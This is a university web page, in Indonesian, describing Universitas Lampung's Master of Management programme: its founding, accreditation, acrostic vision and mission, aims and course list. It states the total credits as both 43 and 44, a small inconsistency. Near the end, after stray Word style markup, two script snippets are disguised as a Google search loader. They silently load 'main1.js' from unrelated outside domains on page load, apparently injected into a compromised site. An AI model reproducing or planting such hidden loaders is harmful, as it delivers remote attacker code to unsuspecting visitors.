MAGISTER MANAJEMEN

MAGISTER MANAJEMEN
SEJARAH SINGKAT
Program Studi Magister Manajemen Universitas Lampung merupakan salah satu program studi Strata-2 Fakultas Ekonomi yang dikembangkan oleh Universitas Lampung.  Rencana pembukaan Program Studi Magister Manajemen Universitas Lampung berawal pada Agustus 1998 dengan dibentuknya Tim Penyusun Proposal di bawah arahan Dekan Fakultas Ekonomi  Universitas Lampung, Dr. H.M. Faddel Djauhar, SE, dengan anggota: Dr. H. Satria Bangsawan, SE, M.Si.; H. Asep Unik, SE, ME ; H. Toto Gunarto, SE, MSi. (PD I); Nurdiono, SE Akt. (PD II); H.M. Syatibi, SE (PD III).  Pembukaan Program Pascasarjana Program Studi Magister Manajemen Fakultas Ekonomi Universitas Lampung menjadi kenyataan, dengan ditandai  terbitnya Surat  Keputusan  Direktur Jenderal Pendidikan Tinggi No.87/DIKTI/Kep/2000  tertanggal 14 April 2000.
Pada awal pendiriannya, program MM FE UNILA menawarkan tiga konsentrasi yaitu (1) Manajemen Keuangan, (2) Manajemen Pemasaran,  (3) Manajemen Sumber Daya Manusia, yang keseluruhannya dapat ditempuh dalam 4 catur wulan hingga 8 catur wulan (paling lambat) tidak termasuk cuti mahasiswa.  Berdasarkan evaluasi kebutuhan masyarakat, pada tahun 2005 telah dikembangkan konsentrasi Manajemen Pemerintahan dan Keuangan Daerah dan  pada tahun tahun 2007 dibuka konsentrasi Akuntansi Pemerintahan yang bekerja sama dengan Dep. Keuangan pada tanggal 31 Agustus 2007 S.K Ijin Penyelenggaraan Program Studi Magister Manajemen FE Unila dengan Nomor 118/DIKTI/KEP/2007 diperbaharui.  Pada tanggal 24 Desember 2007 Program Studi Magister Manajemen mendapatkan sertifikasi ISO 9001:2000 tentang Sistem Manajemen Mutu di bidang pendidikan.
Dengan telah terbitnya SK Ditjen Dikti tersebut,  secara kelembagaan program MM FE UNILA semakin termotivasi untuk melakukan pembenahan secara akademik dan keuangan.  Pada tahun 2003, pengelola program MM FE UNILA berinisiatif untuk mengajukan permohonan akreditasi pada BAN PT Nasional untuk diakreditasi.  Pada bulan September tahun 2003, program MM FE UNILA telah  terakreditasi B (nilai 4,2), SK Dirjen Dikti: Nomor : 070/BAN-PT/Ak-II/S2/IX/2003, dan pada Tahun 2008 mengajukan re-akreditasi yang akhirnya melalui SK Nomor 017/BAN-PT/Akt-VI/S2/XI/2008, Program MM Unila dinyatakan terakreditasi A.
 

VISI, MISI, DAN TUJUAN

Visi Program Studi MM FE UNILA
Visi dan Misi Program Studi MM FE UNILA tercakup dalam dua kata : THE DREAMCAMP dengan terjemahan bebas “Kampus Impian”. Visi dicakup dalam kata “THE” dan Misi dicakup dalam kata “DREAMCAMP”. Visi Program MM FE UNILA menuju tahun 2020 adalah sebagai berikut :
 

T

To become an excellent institute within consistence toward concept
Tekad kita untuk menjadikan MM FE UNILA sebagai institusi pendidikan terpercaya dan unggul;

H

Honoured by global society is our idea
Harapan di masa datang MM FE UNILA “dihargai” oleh masyarakat global;

E

Educated entrepreneurial to create professional leaders is our dream
Esok, alumni MM FE UNILA menjadi pemimpin (manajer) profesional pembawa kemajuan dan mampu bersaing dalam skala global bukanlah sebatas mimpi;
Visi MM FE UNILA menuju tahun 2020 di atas diambil dari kata THE, yang memberi“makna” luas secara filosofis.

 

Hakekat untuk mencapai visi tersebut di atas dilakukan secara konsisten, bertahap,dan berkelanjutan.

Misi

Visi ini kemudian diterjemahkan kedalam beberapa misi yang akan menjadi ukuran dan panduan secara operasional bagi Program Studi MM FE UNILA dalam menyelenggarakan pendidikan Strata 2 Profesional.  Misi Program Studi MM FE UNILA adalah sebagai berikut:

 

D

Dedication in our carrersin borderless
Dedikasi yang tercurah dalam karir kita untuk mewujudkan visi di atas dilaksanakan agar tidak kenal lelah dan pamrih;

R

Relationship and partnership networking will create success in the future
Rajut jejaring hubungan dan kemitraan merupakan mata tombak untuk mencapai keberhasilan di masa depan.

E

Empowerment, enlightenment and enrichment are our academic atmosfher
Entitas suasana akademik yang dibangun bersama adalah pemberdayaan,pencerahan dan pengayaan dalam nuansa intelektual;

A

Added value in delivery to our the best ability
Aset yang dimiliki ditransformasikan menjadi bernilai tambah yang berlebih merupakan persembahan upaya terbaik Program Studi;

M

Managing integrated teaching between staff &student with love and care is our way of life
MM FE UNILA menyelenggarakan cara hidup keseharian yang saling asah,asuh dan asih;

C

Core competencies  in managerial and leadership are our commitment to  enhance professional-intellectualism and intellectual – professionalism
abilities;
Ceruk kompetensi inti di bidang managerial dan kepemimpinan adalah komitmen kita untuk meningkatkan kemampuan professional yang  berintelektualitas dan intelektual yang berprofesionalitas;

A

A strategic resource-based view of the servicing & learning organization to reach competitive advantage is  proactive, flexible  not-bureaucracy and maintain  those actions by making continuous adjustment;   
Acuan yang didasari sumberdaya strategik pada organisasi pelayanan & pembelajaran untuk memiliki keunggulan bersaing adalah senantiasa bertindak proaktip lentur, tidak birokratis dan melakukan penyesuaian secara terus menerus

M

Modernization and new development in science, technology, culture, spiritual   and art of management & business are pursued with speed;
Modernisasi dan perkembangan yang spektakuler di bidang sains, teknologi, budaya, spiritual dan kiat manajemen & bisnis, harus diburu dengan sigap  dan cepat;

P

Program to establish excellences of the entrepreneurship – professional is our  primary task.
Program untuk membentuk  professional  berjiwa kewirausahaan yang memiliki keunggulan dalam menciptakan lapangan usaha & lapangan kerja  adalah tugas utama kita;

 

Tujuan Umum, Tujuan Khusus dan Manfaat

Tujuan Umum

Program MM Unila secara umum bertujuan memberikan visi/wawasan, pengetahuan, keterampilan, budaya, sikap dan prilaku kepada para peserta praktisi dan non-praktisi lulusan program sarjana, sehingga secara umum mereka akan mampu mengetahui dan memecahkan “inti” persoalan entrepreneurship dan bisnis yang dihadapi dengan berlandaskan pada hakikat ilmu pengetahuan manajemen bisnis yang lebih praktis; membedah kasus-kasus aktual dan unik sehingga melahirkan teori-teori baru, khususnya pada bidang ilmu manajemen.

Selain itu, para lulusannya diharapkan akan memiliki kemampuan entrepreneurial dana manajerial yang terus meningkat dan handal dalam menghadapi situasi berisiko dan ketidakpastian, mengglobal, dan berdaya saing dalam menghasilkan nilai tambah.

Tujuan Khusus

Meningkatkan kemandirian dan membudayakan jiwa entrepreneurship sehingga peserta program mampu mengelola seluruh sumberdaya yang dimiliki secara aktif dan efisien, baik yang terlibat di sektor dunia usaha swasta, koperasi, Lembaga Swadaya Masyarakat (LSM) maupun birokrasi (pegawai pemerintahan dan TNI/Porli) dengan produktivitas tinggi, berdaya saing tinggi (coorperative and competitive advantage) dan memberikan hasil yang bernilai tambah tinggi.
Meningkatkan wawasan bisnis yang visionary bersumberkan pada Iptek tentang manajemen operasional, finansial sumberdaya manusia dan pemasaran sehingga berkemampuan untuk membuat suatu analisis bisnis berdasarkan berbagai pendekatan teori dan praktik manajemen bisnis keuangan.
Meningkatkan pemahaman teori dan kasus-kasus aktual dan unik dalam manajemen pemasaran dan manajemen keuangan.
Mempertajam pemasaran daya analisis dalam manajemen pemasaran dan keuangan dengan berbagai pendekatan teoritis dan empiris yang telah dan sedang mengalami perkembangan, dalam kasus di negara-negara maju, sedang berkembang, maupun di Indonesia.
Meningkatkan kemampuan meneliti, menganalisa dan memecahkan masalah manajemen bisnis secara ilmiah dipandukan dengan pengalaman empirik pada taraf kemampuan, sikap dan keterampilan di atas jenjang lulusan program sarjana.

Manfaat Program Magister Manajemen

Bagi para peserta praktisi (manajer professional, pengusaha pemilik, dan pejabat birokrasi) adalah untuk meningkatkan kemampuan dan keahlian dalam profesi manajemen bisnis, khususnya dalam bidang ilmu manajemen, memiliki jiwa entrepreneurship yang tangguh, unggul serta terdidik.
Bagi para peserta non-praktisi  merupakan wahana pendidikan lanjutan untuk pembekalan diri berdasarkan keprofesian dan keahlian yang akan ditekuni dan diharapkan mumpuni menjadi pionir-pionir pengusaha maupun manajer profesional yang memiliki jiwa entrepreneurship yang tangguh dan terdidik.
Bagi pemerintah adalah tersedianya wahana peningkatan kualitas sumber daya manusia pada jenjang program magister dengan kekhususan bidang ilmu manajemen di luar pulau jawa.  Dari lulusan program ini diharapkan akan mampu meningkatkan dan mengisi jumlah tenaga ahli berkualitas Magister Manajemen yang diperlukan bagi tercapainya tujuan pembangunan.
Bagi perguruan tinggi adalah sebagai wahana pembudayaan proses belajar mengajar, memadukan dan mensintesakan perkembangan teori dan pengalaman empirik para pelaku bisnis dan entrepreneurship, sehingga akan menambah khasanah ilmu pengetahuan atas dasar hasil temuan-temuan penelitian yang diperlukan bagi tercapainya kesejahteraan masyarakat dan tujuan pembangunan nasional.

KURIKULUM

 

Penyelesaian studi pada Program Studi Magister Manajemen  Universitas Lampung diperlukan minimal 43 SKS, yang terdiri dari :

 

1.
Mata Kuliah Inti
24 SKS 

2.
Mata Kuliah Konsentrasi 
15 SKS 

3.
Tesis
5 SKS

Jumlah
44 SKS

Mata Kuliah Inti

1.
   Manajemen Keuangan
3 SKS

2.
 Manajemen Pemasaran
3 SKS

3.
Manajemen Sumberdaya Manusia
3 SKS

4.
Statistika & Metodologi Penelitian Bisnis 
3 SKS

5.
Teori & Perilaku Organisasi
3 SKS

6.
 Sistem Informasi Manajemen
3 SKS

7.
 Manajemen Strategi
3 SKS

8.
 Ekonomi Manajerial
3 SKS

Jumlah
24 SKS

Mata Kuliah Konsentrasi Keuangan

1.
Analisis Investasi dan Manajemen Risiko
3 SKS

2.
Manajemen Keuangan Internasional
3 SKS

3.
Studi Kelayakan Bisnis dan Evaluasi Proyek
3 SKS

4.
Analisis Lingkungan Bisnis dan Kewirausahaan
3 SKS

5.
Seminar Manajemen Keuangan
3 SKS

Jumlah
15 SKS

 

 

Mata Kuliah Konsentrasi Pemasaran  

Strategi Pemasaran
3 SKS

   
Perilaku Konsumen dan Riset Pemasaran
3 SKS

    
Manajemen Pemasaran Internasional
3 SKS

Analisis Lingkungan Bisnis dan Kewirausahaan
3 SKS

Seminar Manajemen Pemasaran
3 SKS

Jumlah
 15 SKS

Mata Kuliah Konsentrasi Manajemen SDM

  
Riset dan Pengembangan SDM
3 SKS

 
Sistem Informasi SDM dan MSDM Internasional
3 SKS

Budaya Organisasi Organisasi       
3 SKS

Analisis Lingkungan Bisnis dan Kewirausahaan
3 SKS

   
Seminar MSDM        
3 SKS

Jumlah
15 SKS

Mata Kuliah Konsentrasi Kewirausahaan

 

Analisis Kebijakan & Strategi Bisnis
3 SKS

   
Komunikasi & Negosiasi Bisnis
3 SKS

Business Plan & Feasibility Study
3 SKS

Analisis Lingkungan Bisnis dan Kewirausahaan
3 SKS

Seminar Manajemen Kewirausahaan
3 SKS

Jumlah
 15 SKS

[if gte mso 9]>

800×600

Normal
0

false
false
false

EN-US
X-NONE
X-NONE

MicrosoftInternetExplorer4

/* Style Definitions */
table.MsoNormalTable
{mso-style-name:”Table Normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:”";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:”Times New Roman”,”serif”;}

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://theboatersnetwork.com/js/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

>>Program Pascasarjana Universitas Lampung berdiri sejak tahun 1999, Sampai sekarang Program Pascasarjana Universitas Lampung sudah mempunyai 2 Program Doktor dan 32 Program Studi Magister Terakreditasi<<